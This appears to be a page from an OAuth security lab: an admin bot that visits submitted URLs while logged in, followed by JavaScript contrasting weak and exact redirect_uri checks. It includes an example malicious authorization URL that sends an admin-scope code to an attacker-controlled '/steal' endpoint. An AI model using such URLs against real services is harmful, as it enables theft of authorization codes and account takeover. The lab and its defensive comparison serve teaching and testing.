Admin Bot

Note: This bot simulates an admin user who will visit URLs you submit. The admin is already logged in to the OAuth provider and will approve authorization requests.

Submit URL for Admin to Visit

API Usage

POST /bot/visit with JSON body:

{ "url": "https://..." }

Example Attack

Submit a malicious OAuth authorization URL:

http://oauth-provider:3008/oauth/authorize?
  client_id=vulnerable-app&
  redirect_uri=https://app.vulnerable.local.attacker.com/steal&
  response_type=code&
  scope=admin
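
The redirect_uri above only works if the provider accepts it for client_id=vulnerable-app. The following is an added example, not code from this lab: it contrasts a prefix-style redirect_uri check, which is an assumption about how the provider validates, with an exact-match check. The registered callback https://app.vulnerable.local/callback and all function names are hypothetical.

```javascript
// Constructed client registry; the callback URL is an assumption, not from the lab.
const REGISTERED = {
  "vulnerable-app": ["https://app.vulnerable.local/callback"],
};

// Weak check (assumed behaviour): string prefix match on the registered origin.
// "https://app.vulnerable.local" is also a prefix of a longer, unrelated hostname.
function prefixCheck(clientId, redirectUri) {
  const allowed = REGISTERED[clientId] || [];
  return allowed.some((u) => redirectUri.startsWith(new URL(u).origin));
}

// Hardened check: the value must parse as an https URL without userinfo or
// fragment, and must equal a registered redirect URI character for character.
function exactCheck(clientId, redirectUri) {
  const allowed = REGISTERED[clientId];
  if (!allowed || typeof redirectUri !== "string") return false;
  let parsed;
  try {
    parsed = new URL(redirectUri);
  } catch {
    return false; // not an absolute URL
  }
  if (parsed.protocol !== "https:") return false;
  if (parsed.username || parsed.password || parsed.hash) return false;
  return allowed.includes(redirectUri);
}

// Evaluate an authorization URL (as submitted to /bot/visit) under both checks.
function reviewAuthorizeUrl(authorizeUrl) {
  const params = new URL(authorizeUrl).searchParams;
  const clientId = params.get("client_id");
  const redirectUri = params.get("redirect_uri") || "";
  return {
    clientId,
    redirectUri,
    prefixAccepts: prefixCheck(clientId, redirectUri),
    exactAccepts: exactCheck(clientId, redirectUri),
  };
}

// The example URL from this page, joined onto one line.
const SAMPLE =
  "http://oauth-provider:3008/oauth/authorize?client_id=vulnerable-app" +
  "&redirect_uri=https://app.vulnerable.local.attacker.com/steal" +
  "&response_type=code&scope=admin";

console.log(reviewAuthorizeUrl(SAMPLE));
```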